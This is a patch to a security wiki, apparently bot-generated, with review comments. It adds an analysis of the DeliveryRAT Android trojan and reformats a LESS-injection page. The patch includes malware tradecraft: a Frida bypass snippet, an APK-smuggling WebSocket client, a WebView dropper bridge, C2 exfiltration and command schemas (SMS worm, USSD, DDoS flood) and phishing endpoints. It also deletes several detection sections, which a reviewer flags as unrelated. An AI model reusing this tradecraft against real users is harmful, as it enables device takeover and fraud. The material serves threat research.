From d59e46483b2f8a9a7f0b436749cf21f375127cd4 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 3 Nov 2025 19:09:51 +0000 Subject: [PATCH] Add content from: Delivery details: analysis of the new DeliveryRAT Android tr... --- .../mobile-phishing-malicious-apps.md | 159 ++++++++++++++---- .../css-injection/less-code-injection.md | 7 +- 2 files changed, 129 insertions(+), 37 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..b40d8cea328 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -54,15 +54,12 @@ * **Network Canary** – Configure `iptables -p tcp --dport 80 -j NFQUEUE` to detect unsolid POST bursts after code entry. * **mobileconfig Inspection** – Use `security cms -D -i profile.mobileconfig` on macOS to list `PayloadContent` and spot excessive entitlements. -## Blue-Team Detection Ideas - -* **Certificate Transparency / DNS Analytics** to catch sudden bursts of keyword-rich domains. -* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` from Dalvik clients outside Google Play. -* **Invite-code Telemetry** – POST of 6–8 digit numeric codes shortly after APK install may indicate staging. -* **MobileConfig Signing** – Block unsigned configuration profiles via MDM policy. ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida: auto-bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,14 +79,18 @@ Java.perform(function() { }); ``` +
+ + ## Indicators (Generic) -``` +```text /req/checkCode.php # invite code validation /upload.php # batched ZIP exfiltration LubanCompress 1.1.8 # "Luban" string inside classes.dex ``` + --- ## Android WebView Payment Phishing (UPI) – Dropper + FCM C2 Pattern @@ -119,7 +120,7 @@ zipgrep -i "classes|.apk" sample.apk | head Example (sanitised): -``` +```text GET https://rebrand.ly/dclinkto2 Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php Transform: "gate.html" → "gate.htm" (loaded in WebView) @@ -127,6 +128,7 @@ UPI credential POST: https://sqcepo.replit.app/addup.php SMS upload: https://sqcepo.replit.app/addsm.php ``` + Pseudo-code: ```java @@ -206,21 +208,6 @@ public void onMessageReceived(RemoteMessage msg){ } ``` -### Hunting patterns and IOCs -- APK contains secondary payload at `assets/app.apk` -- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php` -- SMS exfiltration to `/addsm.php` -- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints -- Apps labelled as generic “Update/Secure Update” -- FCM `data` messages with a `_type` discriminator in untrusted apps - -### Detection & defence ideas -- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`. -- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows. -- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure. -- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field. - ---- ## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages @@ -228,6 +215,9 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO smuggling client example + ```javascript // Open Socket.IO channel and request payload const socket = io("wss:///ws", { transports: ["websocket"] }); @@ -248,16 +238,14 @@ socket.on("downloadComplete", () => { }); ``` +
+ + Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. - Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. -Hunting and detection ideas: -- Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. -- Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. -- Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. - See also WebSocket tradecraft and tooling: {{#ref}} @@ -274,6 +262,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+Dropper WebView install bridge (Java) + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +294,9 @@ public class DropperActivity extends Activity { } ``` +
+ + HTML on the page: ```html 
@@ -421,13 +415,107 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Comms/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact` - NFC: `nfs`, `nfs_inject` -### Detection & defence ideas (RatOn-style) -- Hunt for WebViews with `addJavascriptInterface()` exposing installer/permission methods; pages ending in “/access” that trigger Accessibility prompts. -- Alert on apps that generate high-rate Accessibility gestures/clicks shortly after being granted service access; telemetry that resembles Accessibility node dumps sent to C2. -- Monitor Device Admin policy changes in untrusted apps: `lockNow`, password expiration, keyguard feature toggles. -- Alert on MediaProjection prompts from non-corporate apps followed by periodic frame uploads. -- Detect installation/launch of an external NFC-relay app triggered by another app. -- For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. + +## DeliveryRAT – server‑driven phishing + OTP/notification interception + USSD + device‑sourced HTTP DDoS (Android) + +Threat pattern distilled from 2025 DeliveryRAT builds: a loader‑>payload sideload, aggressive runtime permissioning, a WebSocket/REST C2, server‑driven phishing Activities, SMS/contact abuse, USSD dialing, and an on‑device HTTP flooder. + +### Distribution and loader +- Small loader APK (e.g., `com.harry.loader`) embeds the RAT under `res/raw/` and shows a fake “Update” page. +- Tapping Update requests Install‑unknown‑apps permission, installs the embedded APK, and then launches it by package (payload family typically `com.delviskesyty.*`). +- Hides the obvious “download APK” flow and reduces friction; future runs start the payload by package name. 
+ +### First‑run flow and permissions +- Prompts for Notification Listener and to ignore battery optimizations; starts a long‑lived `WebSocketService` and displays a server‑driven UI beginning with a “tracking number” input. +- Requests telephony/SMS perms depending on mode: `READ_SMS`, `RECEIVE_SMS`, `SEND_SMS`, `READ_PHONE_STATE`, `CALL_PHONE`; polls for `READ_PHONE_NUMBERS` and default‑SMS‑app status every ~5s. +- SIM/line metadata is posted to `/send-number`; the entered tracking number plus SIM info is posted to `/track-nomer` to drive next steps. +- Operating modes via config: `MODE="standart"` (full perms) vs `MODE="mini"` (low‑friction, primarily asks to become the default SMS handler to retain OTP interception). + +### Server‑driven phishing Activities (operator UI) +The C2 selects one of five Activities, providing texts/assets and the exfil endpoint: +- Card → collects cardholder/payment fields; POST `/send-card`. +- Custom → up to three arbitrary text inputs; POST `/send-custom`. +- Photo → requests `READ_MEDIA_IMAGES`/`READ_EXTERNAL_STORAGE`, lets user pick an image; POST `/send-photo`. +- Qr → shows a server‑provided QR bitmap and text; continues flow. +- Text → arbitrary text with confirm. +Lifecycle callbacks POST to `/open-app`, `/swap-app`, `/close-app` so operators can track progress. + +### Persistence and data‑capture components +- `NotificationListenerService`: forwards notification metadata/content to `/send-notification` and attempts to hide original notifications (conceals OTPs). +- `SmsReceiver`: ingests inbound SMS; rebroadcasts `ACTION_NEW_SMS` to `WebSocketService` for near‑real‑time exfil. +- `BootReceiver`: autostarts `WebSocketService` after boot. +- Service hardening: 1‑minute `AlarmManager` + ~15‑minute watchdog; foreground notification (benign‑looking) such as “Data Sync”; network change receiver for auto‑reconnect. 
+ +### C2 over WebSocket + REST +- Device derives a HWID from `Settings.Secure.ANDROID_ID`; maintains a persistent WS channel and periodic HTTP POSTs to REST paths. +- SMS exfiltration payload includes device/SIM metadata, team/worker IDs and the victim “track number”. + +
+Example SMS exfil JSON (WebSocket) + +```json +{ + "Data": { + "message": "{sms_body}", + "sender": "{sender_phone}", + "messageId": "{sms_timestamp}", + "dateString": "{formatted_date}", + "hwid": "{android_id}", + "service": "{app_name}", + "teamId": "{team_id}", + "workerId": "{worker_id}", + "trackNumber": "{track_number}", + "deviceModel": "{Build.MODEL}", + "androidVersion": "{Build.VERSION.RELEASE}", + "type": "Новое смс", + "serviceCenter": "{sms_smsc}", + "operator": "{sim_operator}", + "phoneNumber": "{device_phone}" + } +} +``` + +
+ +- REST endpoints commonly observed (relative to the operator domain): `/send-number`, `/track-nomer`, `/send-card`, `/send-custom`, `/send-photo`, `/send-notification`, `/send-ussd`, `/send-answer`. + +### Remote command schema and behaviours +Generic command envelope (WS → device): + +```json +{ + "type": "{command}", + "number": "{number}", + "text": "{text}", + "useAlternativeIcon": "{bool}", + "target": "{ddos_url}", + "total": "{ddos_total_requests}", + "concurrency": "{parallel_requests}", + "photo": "{base64_qr_bitmap}" +} +``` + +Observed commands: +- `allSmsContact` (`text`): mass‑send arbitrary SMS to every unique contact (worm‑like spread). +- `call` / `callTwo` (`number`): dial arbitrary USSD; responses POSTed to `/send-ussd`. +- `card`, `custom`, `photo`, `qr`: launch the phishing Activities described above. +- `changeIcon` (`useAlternativeIcon`) and `hide`: stealth controls (alt icon, hide launcher entry). +- `oldsms`: dump existing SMS to a text file and exfil via `/send-answer`. +- DDoS: set `target` + `total` + `concurrency` to trigger a parallel HTTP flood from the handset. + +### Static config traits (typical keys) + +```json +{ + "API": "", + "APPLICATION_ID": "com.delviskesyty.{...}", + "MODE": "standart|mini", + "TEAM_ID": "{id}", + "WORKER_ID": "{id}", + "VERSION_NAME": "2.x" +} +``` + ## References @@ -440,5 +528,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Delivery details: analysis of the new DeliveryRAT Android trojan version (F6)](https://www.f6.ru/blog/android-deliveryrat-research/) {{#include ../../banners/hacktricks-training.md}} 
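Review bot: hunk @@ -54,15 +54,12 @@ deletes the whole "## Blue-Team Detection Ideas" list (CT/DNS analytics, the `(?i)POST\s+/(check|upload)\.php` regex, invite-code telemetry, MobileConfig signing) and the same pattern recurs in @@ -206,21 +208,6 @@ ("### Hunting patterns and IOCs" and "### Detection & defence ideas"), @@ -248,16 +238,14 @@ ("Hunting and detection ideas") and @@ -421,13 +415,107 @@ ("### Detection & defence ideas (RatOn-style)"), with nothing added in their place. The subject line says this commit adds DeliveryRAT content, so these removals look unrelated and they strip every defender-facing paragraph from the page; please restore the four blocks, or, if they are being consolidated, land the consolidated detection section in this same commit so the page never ships without it.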
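Review bot: in hunk @@ -54,15 +54,12 @@ the Frida snippet is still fenced as ```python although its first line is a shell comment (`# frida -U -f com.badapp.android -l bypass.js --no-pause`) and the body is JavaScript (`Java.perform(function() {`); since this hunk already touches the block to wrap it in a details element, change the fence to ```javascript and turn the leading `#` comment into a `//` comment, so the highlighting matches the `bypass.js` file the comment names and the block is copy-pasteable as written.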
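Review bot: the DeliveryRAT section added in hunk @@ -421,13 +415,107 @@ uses a non-ASCII hyphen character throughout ("server‑driven", "long‑lived", "near‑real‑time", "team/worker IDs" aside), which breaks plain-text search for "server-driven" and renders as a different glyph in some fonts; replace them with ASCII hyphens, and rewrite "loader‑>payload" as "loader → payload" (or "loader-to-payload") since the hyphen-plus-greater-than reads as a typo. In the same section the `type` value `Новое смс` in the SMS exfil JSON is left unexplained; a parenthetical in the surrounding prose (Russian for "new SMS") would tell English readers what the discriminator means without altering the sample.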
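Review bot: under "Observed commands" in hunk @@ -421,13 +415,107 @@ every command is identified by its `type` string except the flood, which is described only as "DDoS: set `target` + `total` + `concurrency`"; because the envelope right above it makes `type` the command discriminator, state the `type` value that triggers the flood (or say explicitly that the source does not name it), otherwise a reader cannot tell it apart from the other commands in traffic. The "Static config traits" block likewise shows `"API": ""` with no comment on what the key holds; a one-line note (operator domain, or unknown) would make the example usable.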
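Review bot: the new DeliveryRAT section in hunk @@ -421,13 +415,107 @@ is the only family on the page without a detection/defence list, even though the hunk already spells out observable traits: a loader that installs a second APK from `res/raw/` and relaunches it by package name, first-run prompts for Notification Listener plus battery-optimization exemption, polling for default-SMS-app status roughly every 5 s, a benign-looking foreground notification such as "Data Sync", and REST paths like `/send-number`, `/track-nomer`, `/send-notification` and `/send-ussd`. Suggest closing the section with a short "### Detection & defence ideas" list built from exactly those traits, in the same shape as the RatOn list this hunk removes.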
diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}